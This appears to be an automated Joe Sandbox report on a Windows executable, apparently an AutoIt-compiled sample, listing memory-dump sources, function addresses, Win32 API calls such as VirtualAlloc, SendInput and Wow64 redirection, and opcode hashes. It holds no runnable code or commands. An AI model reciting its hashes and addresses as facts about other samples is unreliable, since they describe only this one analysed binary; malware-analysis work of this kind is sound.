                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 91da43fc1cfea6ee9d836a36649b014a5b4e7eef45c65692516c77ac3a8c283e
                    • Instruction ID: 9a9081181f2404109935751355067235a24dc67ad4bf651d9bcedf8e5b1d9cd5
                    • Opcode Fuzzy Hash: 91da43fc1cfea6ee9d836a36649b014a5b4e7eef45c65692516c77ac3a8c283e
                    • Instruction Fuzzy Hash: E1219F32510219BBDF169F64CC46FEA3B79EF48724F110214FE15AB1D0DAB1A851DBA1
                    Function 00CF797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CF79E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CF79F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CF7A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 677f42c43a28df9b864e746fe300a0b1fbb5c4cbcc08f08b4da2a3ecd593f4e4
                    • Instruction ID: ad97a13d19322d7ffd04481dea5b922ac661ed7e70262e47d67dd23a7ed9eda2
                    • Opcode Fuzzy Hash: 677f42c43a28df9b864e746fe300a0b1fbb5c4cbcc08f08b4da2a3ecd593f4e4
                    • Instruction Fuzzy Hash: FD11E772244208BADF149F64CC05FAB77A9EF89764F02461DFB51A6090D6B1D811DB60
                    Function 00CEC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00CB1D88,?), ref: 00CEC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CEC324
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 66b87d7544e4283b62d330b42fd072ecd6a4fa6731a41a7be5d83afbab238baf
                    • Instruction ID: 61c687fcc57e0d79e5c32c864aecae19f6b2fbb01853eb7b546de63356f0d3c3
                    • Opcode Fuzzy Hash: 66b87d7544e4283b62d330b42fd072ecd6a4fa6731a41a7be5d83afbab238baf
                    • Instruction Fuzzy Hash: 79E01274610713CFDB344F6AD884BDA76E4EF19759B80C43DE8A5D2260E7B0D842CB61
                    Function 00C74C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C74C2E), ref: 00C74CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C74CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: ec205fa07f3a2283ee047eaffe20cbfb98e8c3d8fd4b109895b3a0b61fc8342a
                    • Instruction ID: e5cb087d0f6740bf5a94cb772ae4f87f10a4b50579a6bff48db49aa400185b89
                    • Opcode Fuzzy Hash: ec205fa07f3a2283ee047eaffe20cbfb98e8c3d8fd4b109895b3a0b61fc8342a
                    • Instruction Fuzzy Hash: 9DD05E31610727CFD7249F31DE5872A76E5EF05791B11C83ED89AD6250E770D881CA52
                    Function 00C74D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C74CE1,?), ref: 00C74DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C74DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: a769153434d21c6c08b5a5db9d73de2631ff2a7a7cf76007a73dfe10cf0c0854
                    • Instruction ID: a82061e725ecf161ed56deb31b8875ed677a604cf97c1ae5b2ee7d6bdaead452
                    • Opcode Fuzzy Hash: a769153434d21c6c08b5a5db9d73de2631ff2a7a7cf76007a73dfe10cf0c0854
                    • Instruction Fuzzy Hash: 2FD01731550723CFD7349F31D858B5A76E4EF15355B11C83ED8EAD6250E770D880CA61
                    Function 00C74D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C74D2E,?,00C74F4F,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C74D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: bce4cf10b85a885c30544f374b541caa712906b4d27edf98ad2063f046aec2fa
                    • Instruction ID: 6c067c8c27bd522fb9637c6f52cafdaab2c24ed4eafde3c8be4036998e2ac93b
                    • Opcode Fuzzy Hash: bce4cf10b85a885c30544f374b541caa712906b4d27edf98ad2063f046aec2fa
                    • Instruction Fuzzy Hash: 4CD01731510723CFD7349F32D84872A76E8EF25352B11C83E94DAD6250E770D880CA61
                    Function 00CF1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00CF12C1), ref: 00CF1080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CF1092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 4f46bdbd5532b808fbad7a713c89ee48316f3294a65d26f29b5541489ac5dfcc
                    • Instruction ID: d5e229f5eb7de8029612dc823bd8d6a7155a6fb1cb55ab54857da3fcdc314d88
                    • Opcode Fuzzy Hash: 4f46bdbd5532b808fbad7a713c89ee48316f3294a65d26f29b5541489ac5dfcc
                    • Instruction Fuzzy Hash: BAD0E231510726CFD7209B35E818A2A76E4AF15365B55C82EA89ADA250EBB0D880CA62
                    Function 00CE93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CE9009,?,00CFF910), ref: 00CE9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CE9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: 651f2626d57546047766de408fb1d7736a7bbe45bcf8ec470a0c4cc963bc8760
                    • Instruction ID: 43515b5f04f2fe162db630a27d060415e4aa8bd3816bec5a378602ca6e6aad12
                    • Opcode Fuzzy Hash: 651f2626d57546047766de408fb1d7736a7bbe45bcf8ec470a0c4cc963bc8760
                    • Instruction Fuzzy Hash: 67D0C736500323CFC7208F32D90831A72E4EF00341B01C83EA492D2690E670C881DA22
                    Function 00CEE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00CEE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 00CEE415
                      • Part of subcall function 00CEDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CEDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CEE615
                    • _memmove.LIBCMT ref: 00CEE628
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: f0ea4cb73688f9a7c3f8804d5e566427ee3ae41755023a133a93620f7912d6b6
                    • Instruction ID: 4ea223efa51e2190d0da355d6c5fcae380fc7f7d8f603087f24caafaf6d3fa92
                    • Opcode Fuzzy Hash: f0ea4cb73688f9a7c3f8804d5e566427ee3ae41755023a133a93620f7912d6b6
                    • Instruction Fuzzy Hash: FCC16A716083419FCB14DF29C48096ABBE4FF88754F14896EF8999B351D731EA46CB82
                    Function 00CC6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: f68449de3af720e8789962c31a60f60dbb3eba05074f0e7691591686116ceb36
                    • Instruction ID: 86f74922818cdd470a30e677dfce78cd192a27c8c8d1a86492ecfa0856f80f98
                    • Opcode Fuzzy Hash: f68449de3af720e8789962c31a60f60dbb3eba05074f0e7691591686116ceb36
                    • Instruction Fuzzy Hash: 265183316083019BDF24AFA6D895F2EB7E5EF48310F24891FE55ACB291DB709940EF15
                    Function 00CD97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C75045: _fseek.LIBCMT ref: 00C7505D
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AAE
                      • Part of subcall function 00CD99BE: _wcscmp.LIBCMT ref: 00CD9AC1
                    • _free.LIBCMT ref: 00CD992C
                    • _free.LIBCMT ref: 00CD9933
                    • _free.LIBCMT ref: 00CD999E
                      • Part of subcall function 00C92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C99C64), ref: 00C92FA9
                      • Part of subcall function 00C92F95: GetLastError.KERNEL32(00000000,?,00C99C64), ref: 00C92FBB
                    • _free.LIBCMT ref: 00CD99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                    • Instruction ID: b80ae90a0d92714c3690fe6438db019e9c5f74896b568d2c179229069c71c059
                    • Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                    • Instruction Fuzzy Hash: 02516DB5904218AFDF249F64CC85A9EBBB9EF48310F0044AEB64DA7381DB715E80DF58
                    Function 00CF9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(0088E9D8,?), ref: 00CF9AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00CF9B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00CF9B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: a161d71504bb50c4626c6621af864a23de5b710ade13945ac1012d22dceac1e4
                    • Instruction ID: f9d56835a79880a79dfa734a09a2ca1e65c3673a51237b48bffd4320c014933a
                    • Opcode Fuzzy Hash: a161d71504bb50c4626c6621af864a23de5b710ade13945ac1012d22dceac1e4
                    • Instruction Fuzzy Hash: AD512C34A00209AFCF64DF68D880ABE7BB5FF54360F148159FA259B2A0D730EE41DB91
                    Function 00CDBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CDBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 00CDBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CDBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CDBB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 5564a2b5af9ddfab557098e59acd82888bbf8bd70ba7c37ec821e54f5e74031d
                    • Instruction ID: 6c506f2195e8d8e18642c9133a2cb1b303e7ae1e1c83172fe1d120eed8029ce0
                    • Opcode Fuzzy Hash: 5564a2b5af9ddfab557098e59acd82888bbf8bd70ba7c37ec821e54f5e74031d
                    • Instruction Fuzzy Hash: 08410239200610DFCB11EF15C584A5DBBE1EF89320B09C499EA4E9B362CB34FD01EB92
                    Function 00CF8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CF8B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: fde7fbc23268ffe400ce06213adabd386f70631afd1c94f8f7b2e059538b16f9
                    • Instruction ID: 763071db20dfca404a032b3e93ba683d244e766f3d9e974ab0303d3a90bb6b9d
                    • Opcode Fuzzy Hash: fde7fbc23268ffe400ce06213adabd386f70631afd1c94f8f7b2e059538b16f9
                    • Instruction Fuzzy Hash: 163172B460420CBFEFA49B59CC89FB93765EB05310F648516FB61D62A1CE30AA489753
                    Function 00CFADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00CFAE1A
                    • GetWindowRect.USER32(?,?), ref: 00CFAE90
                    • PtInRect.USER32(?,?,00CFC304), ref: 00CFAEA0
                    • MessageBeep.USER32(00000000), ref: 00CFAF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: e4724ce08922fdfcc8d3ab58c797f0f82982259f8b04e303848b770913f55a8a
                    • Instruction ID: e9543ce93944880f1918f46dad365b646641cdd29df0678ba265026d7fdd4926
                    • Opcode Fuzzy Hash: e4724ce08922fdfcc8d3ab58c797f0f82982259f8b04e303848b770913f55a8a
                    • Instruction Fuzzy Hash: 774169B4600219AFCB51CF59C884BA9BBF5FF48350F1481A9EA18CB351D730E952DBA3
                    Function 00CD0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CD1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CD1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CD10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CD110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: f33c13fe2eb3fb0b72c82c54751ec7032c930ce0dfcb8f11ac5c2163986ab6e8
                    • Instruction ID: 9e3e10fdef0308524e8298bc8b6f03ff3870a7ca2657037f67a9df56b1c3b06f
                    • Opcode Fuzzy Hash: f33c13fe2eb3fb0b72c82c54751ec7032c930ce0dfcb8f11ac5c2163986ab6e8
                    • Instruction Fuzzy Hash: 63313D70E40648BEFB30AA658C057FEBBA5AF44310F1C421BEB60523D1C3749AC19751
